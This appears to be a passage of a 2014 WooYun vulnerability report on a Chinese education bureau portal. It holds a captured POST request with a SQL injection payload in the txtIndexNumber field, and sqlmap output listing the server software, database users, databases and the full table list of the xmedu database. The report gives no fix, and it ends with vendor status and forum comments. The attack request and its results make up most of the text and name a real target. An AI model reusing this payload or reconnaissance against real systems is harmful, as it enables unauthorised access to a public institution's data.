ldE9mZh8ZAgJkZAIED2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9NB8ABQzln7rnoYDmlZnogrIfGAUKbGlua1NldE9mZh8ZAgJkZAIFD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9NR8ABRXogYzkuJrkuI7miJDkurrmlZnogrIfGAUKbGlua1NldE9mZh8ZAgJkZAIGD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9Nh8ABQzpq5jnrYnmlZnogrIfGAUKbGlua1NldE9mZh8ZAgJkZAIHD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9Nx8ABQzmlZnogrLmlLbotLkfGAUKbGlua1NldE9mZh8ZAgJkZAIID2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9OB8ABRLnpL7kvJrlipvph4/lip7lraYfGAUKbGlua1NldE9mZh8ZAgJkZAIJD2QWAmYPZBYCAgEPDxYIHxcFNmh0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9OR8ABQznu7zlkIjmnI3liqEfGAUKbGlua1NldE9mZh8ZAgJkZAIKD2QWAmYPZBYCAgEPDxYIHxcFN2h0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9MTAfAAUM5pWZ6IKy5Lq65LqLHxgFCmxpbmtTZXRPZmYfGQICZGQCCw9kFgJmD2QWAgIBDw8WCB8XBTdodHRwOi8vMjIwLjE2MC4xMTkuMzE6ODEvdGFiaWQvMjg5L0RlZmF1bHQuYXNweD9jYXRlPTExHwAFDeaVmeiCsumXrumimCAfGAUKbGlua1NldE9mZh8ZAgJkZAIMD2QWAmYPZBYCAgEPDxYIHxcFN2h0dHA6Ly8yMjAuMTYwLjExOS4zMTo4MS90YWJpZC8yODkvRGVmYXVsdC5hc3B4P2NhdGU9MTIfAAUM5YW25a6D6Zeu6aKYHxgFCmxpbmtTZXRPZmYfGQICZGQCEQ9kFgICAQ9kFgQCAQ8PFgIfAWhkZAIDD2QWAgIBDw9kFgIfDwUcTW9k5LqS5Yqo5ZKo6K+i5YWo6YOo5Zue5aSNQxYCAgEPDxYCHxAC/////w9kFgYCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQRuYW1lHg5EYXRhVmFsdWVGaWVsZAUKQ2F0ZWdvcnlJZB4LXyFEYXRhQm91bmRnZBAVDQAM5oub55Sf6ICD6K+VFeS4reWwj+W5vOWtpueUn+WFpeWtpgzmlZnluIjmi5vogZgM5Z+656GA5pWZ6IKyFeiBjOS4muS4juaIkOS6uuaVmeiCsgzpq5jnrYnmlZnogrIM5pWZ6IKy5pS26LS5EuekvuS8muWKm+mHj+WKnuWtpgznu7zlkIjmnI3liqEM5pWZ6IKy5Lq65LqLDeaVmeiCsumXrumimCAM5YW25a6D6Zeu6aKYFQ0CLTEBMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTIUKwMNZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsACwEADxYOHxFmHg9TcWxGaWx0ZXJTdHJpbmcFOyBJbnRlcmFjdENhdGVnb3J5SWQ9MCBhbmQgU3RhdHVzPTIgIGFuZCBJbmRleE51bWJlcj0nMzAxNDMnHxJmHxMCAR8UBQpJbnRlcmFjdElkHxUWAB8WZmQWAmYPZBYCAgMPZBYCZg8PZBYCHgdjb2xzcGFuBQExZAIPD2QWBmYPDxYEHwAFBummlumhtR4HRW5hYmxlZGhkZAICDw8WBB8ABQnkuIrkuIDpobUfH2hkZAIPDw8WAh8ABTnmgLvmlbA6MTIxMTRb5q+P6aG1MTXmnaHnm65dLDxmb250IGNvbG9yPXJlZD4xPC9mb250Pi84MDhkZAITD2QWBgIBD2QWBmYPDxYCHwFoZGQCAg9kFgICAg8WAh8BaBYGZg8WAh8GZGQCAQ8WAh8GZGQCAg8WAh8GZGQCBA9kFgICAQ8PZBYCHw8FC01vZEVTU0hUTUxDZAIDD2QWBmYPDxYCHwFoZGQCAg9kFgICAg8WAh8BaBYGZg8WAh8GZGQCAQ8WAh8GZGQCAg8WAh8GZGQCBA9kFgICAQ8PZBYCHw8FC01vZEVTU0hUTUxDZAIFD2QWBmYPDxYCHwFoZGQCAg9kFgICAg8WAh8BaBYGZg8WAh8GZGQCAQ8WAh8GZGQCAg8WAh8GZGQCBA9kFgICAQ8PZBYCHw8FC01vZEVTU0hUTUxDZAIVD2QWAgIBD2QWBAIBDw8WAh8BaGRkAgMPZBYCAgEPD2QWAh8PBQtNb2RFU1NIVE1MQ2QCFw9kFgICAQ9kFgQCAQ8PFgIfAWhkZAIDD2QWAgIBDw9kFgIfDwULTW9kRVNTSFRNTENkAgwPFCsAAhQrAANkZGRkZGQ=
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ScrollTop"
228
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="__essVariable"
{"__scdoff":"1","__ess_pageload":"__ess_setScrollTop();"}
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="Q"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$ddlCategoryId"
-1
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtKeyWord"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtIndexNumber"
30143' AND 4900=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(111)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN (4900=4900) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'fBuH'='fBuH
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$txtName"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="ess$ctr1035$InteractConsultList$wuPager$txtPageNum"
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu"
各区教育局
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu2"
直属单位
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu4"
直属学校
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu6"
省市教育站点
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu5"
省政府机关
-----------------------------7de28324bf0da6
Content-Disposition: form-data; name="jumpMenu7"
专题网站
-----------------------------7de28324bf0da6--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'dtxmedu'
current database: 'xmedu'
current user is DBA: False
database management system users [2]:
[*] dtxmedu
[*] sa
数据库:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'dtxmedu'
available databases [8]:
[*] HuilanCInfo
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xmedu
HuilanCInfo 中科汇联http://www.huilan.com/?
xmedu数据库表:
+---------------------------------------+
| Affiliates |
| AjaxModWrapper_MasterTemplate |
| AjaxModWrapper_Placeholders |
| AnonymousUsers |
| Assemblies |
| Authentication |
| Banners |
| C_InfoCategory |
| C_InfoExt |
| C_InfoExtFiled |
| C_InfoExtValue |
| C_InfoItemRole |
| C_InfoModuleInfos |
| C_InfoPage |
| C_InfoSpec |
| C_InfoSpecInfo |
| C_InfoVersions |
| C_info |
| C_infoKeyword |
| C_infoLink |
| C_infoRemark |
| Classification |
| ContentItems |
| ContentItems_MetaData |
| ContentItems_Tags |
| ContentTypes |
| Core_Permissions |
| Core_PermissionsAuthority |
| Dashboard_Controls |
| Date_Month |
| DesktopModulePermission |
| DesktopModules |
| ESSPRO_License |
| EWS_GlobalSettings |
| EasySite_Min |
| EasySite_MinReply |
| Edu_CrawlData |
| Edu_CrawlDataCategory |
| EventLog |
| EventLogConfig |
| EventLogTypes |
| EventQueue |
| Favorite_Category |
| Favorite_Favorites |
| Files |
| FolderPermission |
| Folders |
| HostSettings |
| HtmlText |
| HtmlTextLog |
| HtmlTextUsers |
| IFrame_Parameters |
| InfoPub_RequestInfo |
| Interview |
| InterviewMessage |
| JD_Min |
| JD_MinReply |
| LanguagePacks |
| Languages |
| Links |
| Lists |
| Messaging_Messages |
| MetaData |
| ModuleCache |
| ModuleControls |
| ModuleDefinitions |
| ModulePermission |
| ModuleSettings |
| Modules |
| News_Feeds |
| ORG_ColumnSetting |
| ORG_Department |
| ORG_Duty |
| ORG_ExtFieldData |
| ORG_ExtFieldDef |
| ORG_Group |
| ORG_Organization |
| ORG_Position |
| ORG_Relation |
| ORG_RoleMapping |
| ORG_UserStaff |
| OnlineInteract |
| OnlineInteractCategory |
| OnlineInteract_Flow |
| OnlineInteract_Process |
| OperationLogs |
| OutputCache |
| PackageTypes |
| Packages |
| Permission |
| PortalAlias |
| PortalDesktopModules |
| PortalLanguages |
| PortalLocalization |
| PortalSettings |
| Portals |
| Profile |
| ProfilePropertyDefinition |
| RoleGroups |
| Roles |
| SW_Quiz |
| SW_Reply |
| SW_Word |
| SceneNavigation |
| Schedule |
| ScheduleHistory |
| ScheduleItemSettings |
| SearchCommonWords |
| SearchIndexer |
| SearchItem |
| SearchItemWord |
| SearchItemWordPosition |
| SearchWord |
| SiteLog |
| SkinControls |
| SkinPackages |
| Skins |
| SurveyIP |
| SurveyIPNextEnableDate |
| SurveyOptions |
| SurveyResults |
| Surveys |
| SysRunLogs |
| SystemMessages |
| TabModuleSettings |
| TabModules |
| TabPermission |
| TabSettings |
| Tabs |
| Taxonomy_ScopeTypes |
| Taxonomy_Terms |
| Taxonomy_Vocabularies |
| Taxonomy_VocabularyTypes |
| UrlLog |
| UrlTracking |
| Urls |
| UserAuthentication |
| UserPortals |
| UserProfile |
| UserRoles |
| Users |
| UsersOnline |
| VIEW_ORG_Department |
| VIEW_ORG_Duty |
| VIEW_ORG_ES_Users |
| VIEW_ORG_ES_vw_Users |
| VIEW_ORG_Organization |
| VIEW_ORG_Position |
| VIEW_ORG_Relation |
| VIEW_ORG_UserStaff |
| VendorClassification |
| Vendors |
| Version |
| View_EasySearh_CInfo |
| View_EasySearh_OnlineInteract |
| WebServers |
| Workflow |
| WorkflowDef |
| WorkflowStatePermission |
| WorkflowStates |
| aspnet_Applications |
| aspnet_Membership |
| aspnet_Profile |
| aspnet_Roles |
| aspnet_SchemaVersions |
| aspnet_Users |
| aspnet_UsersInRoles |
| online_an_cmz |
| online_cmz |
| online_switch |
| view_Online_Admin_Question |
| view_Online_Question_user |
| view_onlineInteract |
| view_online_cmz_Statistic |
| vwInterview |
| vw_C_infoByTab |
| vw_DesktopModulePermissions |
| vw_FolderPermissions |
| vw_HaveC_infoPortal |
| vw_HaveC_infoTab |
| vw_Lists |
| vw_ModulePermissions |
| vw_Modules |
| vw_MyArticles |
| vw_MyArticles_Approved |
| vw_MyArticles_UnApproved |
| vw_Portals |
| vw_PortalsDefaultLanguage |
| vw_SearchItems |
| vw_SiteState_AccessStatOfDays |
| vw_SiteState_AccessStatOfMonths |
| vw_SiteState_AccessTabs |
| vw_SiteState_AccessUsers |
| vw_SiteState_CInfoCategorys |
| vw_SiteState_CInfoModules |
| vw_SiteState_CInfoModulesHits |
| vw_SiteState_CInfoModulesNotApproveds |
| vw_SiteState_CInfoPortals |
| vw_SiteState_CInfoRoles |
| vw_SiteState_CInfoSpecs |
| vw_SiteState_CInfoTabs |
| vw_SiteState_CInfoUsers |
| vw_SiteState_UserCreateDates |
| vw_SiteState_UsersCreateDates |
| vw_TabPermissions |
| vw_Tabs |
| vw_UserRoles |
| vw_Users |
| vw_WorkflowStatePermissions |
| vw_aspnet_Applications |
| vw_aspnet_MembershipUsers |
| vw_aspnet_Profiles |
| vw_aspnet_Roles |
| vw_aspnet_Users |
| vw_aspnet_UsersInRoles |
| wfActive |
| wfTrace |
+---------------------------------------+

修复方案:

不知道

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-30 14:44

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-05 10:02 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    呃 怎么忽略了

  2. 2014-09-05 10:03 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    居然看到xmedu这不是教育局的库么,果然和我发现的不一样,我可以提交另一个了

  3. 2014-09-05 10:04 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    呃 我回错地方了......不好意思